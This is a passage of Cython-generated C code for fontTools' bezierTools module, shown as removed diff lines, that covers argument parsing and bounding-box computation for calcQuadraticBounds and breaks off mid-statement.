__Pyx_XDECREF(__pyx_t_1); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_17calcQuadraticBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_16calcQuadraticBounds, "calcQuadraticBounds(pt1, pt2, pt3)\nCalculates the bounding rectangle for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as a 2D tuple.\n pt2: Handle point of the Bezier as a 2D tuple.\n pt3: End point of the Bezier as a 2D tuple.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcQuadraticBounds((0, 0), (50, 100), (100, 0))\n (0, 0, 100, 50.0)\n >>> calcQuadraticBounds((0, 0), (100, 0), (100, 100))\n (0.0, 0.0, 100, 100)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_17calcQuadraticBounds = {"calcQuadraticBounds", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_17calcQuadraticBounds, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_16calcQuadraticBounds}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_17calcQuadraticBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - 
PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticBounds (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 298, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 298, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticBounds", 1, 3, 3, 1); __PYX_ERR(0, 298, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = 
__Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 298, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticBounds", 1, 3, 3, 2); __PYX_ERR(0, 298, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticBounds") < 0)) __PYX_ERR(0, 298, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticBounds", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 298, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_16calcQuadraticBounds(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject 
*__pyx_pf_9fontTools_4misc_11bezierTools_16calcQuadraticBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_ax2 = NULL; - PyObject *__pyx_v_ay2 = NULL; - PyObject *__pyx_v_roots = NULL; - PyObject *__pyx_v_points = NULL; - PyObject *__pyx_7genexpr__pyx_v_t = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_t_11; - Py_ssize_t __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticBounds", 1); - - /* "fontTools/misc/bezierTools.py":316 - * (0.0, 0.0, 100, 100) - * """ - * (ax, ay), (bx, by), (cx, cy) = calcQuadraticParameters(pt1, pt2, pt3) # <<<<<<<<<<<<<< - * ax2 = ax * 2.0 - * ay2 = ay * 2.0 - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - 
__Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_2 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 2; 
__pyx_t_5 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_5)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_5); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 3) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_6 = PyList_GET_ITEM(sequence, 0); - __pyx_t_8 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(__pyx_t_8); - #else - __pyx_t_6 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_8 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_9 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_9); - index = 0; __pyx_t_6 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_6)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_6); - index = 1; __pyx_t_8 = 
__pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_8)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_8); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_9), 2) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_ax = __pyx_t_6; - __pyx_t_6 = 0; - __pyx_v_ay = __pyx_t_8; - __pyx_t_8 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_8 = PyList_GET_ITEM(sequence, 0); - __pyx_t_6 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(__pyx_t_6); - #else - __pyx_t_8 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_6 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_9 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_9); - index = 0; __pyx_t_8 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_8)) goto 
__pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_8); - index = 1; __pyx_t_6 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_6)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_6); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_9), 2) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_bx = __pyx_t_8; - __pyx_t_8 = 0; - __pyx_v_by = __pyx_t_6; - __pyx_t_6 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_5))) || (PyList_CheckExact(__pyx_t_5))) { - PyObject* sequence = __pyx_t_5; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_6 = PyList_GET_ITEM(sequence, 0); - __pyx_t_8 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(__pyx_t_8); - #else - __pyx_t_6 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_8 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - #endif - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_9 = PyObject_GetIter(__pyx_t_5); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_9); - index = 0; 
__pyx_t_6 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_6)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_6); - index = 1; __pyx_t_8 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_8)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_8); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_9), 2) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_cx = __pyx_t_6; - __pyx_t_6 = 0; - __pyx_v_cy = __pyx_t_8; - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":317 - * """ - * (ax, ay), (bx, by), (cx, cy) = calcQuadraticParameters(pt1, pt2, pt3) - * ax2 = ax * 2.0 # <<<<<<<<<<<<<< - * ay2 = ay * 2.0 - * roots = [] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ax, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 317, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ax2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":318 - * (ax, ay), (bx, by), (cx, cy) = calcQuadraticParameters(pt1, pt2, pt3) - * ax2 = ax * 2.0 - * ay2 = ay * 2.0 # <<<<<<<<<<<<<< - * roots = [] - * if ax2 != 0: - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ay, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ay2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":319 - * ax2 = ax * 2.0 - * ay2 = ay * 2.0 - * roots = [] # <<<<<<<<<<<<<< - * if ax2 != 0: - * roots.append(-bx / ax2) - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 319, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":320 - * ay2 = ay * 2.0 - * roots = [] - * if ax2 != 0: # 
<<<<<<<<<<<<<< - * roots.append(-bx / ax2) - * if ay2 != 0: - */ - __pyx_t_10 = (__Pyx_PyInt_BoolNeObjC(__pyx_v_ax2, __pyx_int_0, 0, 0)); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 320, __pyx_L1_error) - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":321 - * roots = [] - * if ax2 != 0: - * roots.append(-bx / ax2) # <<<<<<<<<<<<<< - * if ay2 != 0: - * roots.append(-by / ay2) - */ - __pyx_t_1 = PyNumber_Negative(__pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 321, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_v_ax2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 321, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_11 = __Pyx_PyList_Append(__pyx_v_roots, __pyx_t_5); if (unlikely(__pyx_t_11 == ((int)-1))) __PYX_ERR(0, 321, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":320 - * ay2 = ay * 2.0 - * roots = [] - * if ax2 != 0: # <<<<<<<<<<<<<< - * roots.append(-bx / ax2) - * if ay2 != 0: - */ - } - - /* "fontTools/misc/bezierTools.py":322 - * if ax2 != 0: - * roots.append(-bx / ax2) - * if ay2 != 0: # <<<<<<<<<<<<<< - * roots.append(-by / ay2) - * points = [ - */ - __pyx_t_10 = (__Pyx_PyInt_BoolNeObjC(__pyx_v_ay2, __pyx_int_0, 0, 0)); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 322, __pyx_L1_error) - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":323 - * roots.append(-bx / ax2) - * if ay2 != 0: - * roots.append(-by / ay2) # <<<<<<<<<<<<<< - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - */ - __pyx_t_5 = PyNumber_Negative(__pyx_v_by); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_5, __pyx_v_ay2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_11 = __Pyx_PyList_Append(__pyx_v_roots, __pyx_t_1); if 
(unlikely(__pyx_t_11 == ((int)-1))) __PYX_ERR(0, 323, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":322 - * if ax2 != 0: - * roots.append(-bx / ax2) - * if ay2 != 0: # <<<<<<<<<<<<<< - * roots.append(-by / ay2) - * points = [ - */ - } - - /* "fontTools/misc/bezierTools.py":328 - * for t in roots - * if 0 <= t < 1 - * ] + [pt1, pt3] # <<<<<<<<<<<<<< - * return calcBounds(points) - * - */ - { /* enter inner scope */ - - /* "fontTools/misc/bezierTools.py":324 - * if ay2 != 0: - * roots.append(-by / ay2) - * points = [ # <<<<<<<<<<<<<< - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 324, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":326 - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots # <<<<<<<<<<<<<< - * if 0 <= t < 1 - * ] + [pt1, pt3] - */ - __pyx_t_5 = __pyx_v_roots; __Pyx_INCREF(__pyx_t_5); - __pyx_t_12 = 0; - for (;;) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_5); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 326, __pyx_L15_error) - #endif - if (__pyx_t_12 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyList_GET_ITEM(__pyx_t_5, __pyx_t_12); __Pyx_INCREF(__pyx_t_3); __pyx_t_12++; if (unlikely((0 < 0))) __PYX_ERR(0, 326, __pyx_L15_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_5, __pyx_t_12); __pyx_t_12++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 326, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - __Pyx_XDECREF_SET(__pyx_7genexpr__pyx_v_t, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":327 - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots - * if 0 <= t < 1 # <<<<<<<<<<<<<< - * ] + [pt1, pt3] - * return calcBounds(points) - */ - __pyx_t_3 = 
PyObject_RichCompare(__pyx_int_0, __pyx_7genexpr__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L15_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_3)) { - __Pyx_DECREF(__pyx_t_3); - __pyx_t_3 = PyObject_RichCompare(__pyx_7genexpr__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L15_error) - } - __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 327, __pyx_L15_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":325 - * roots.append(-by / ay2) - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) # <<<<<<<<<<<<<< - * for t in roots - * if 0 <= t < 1 - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_ax, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, 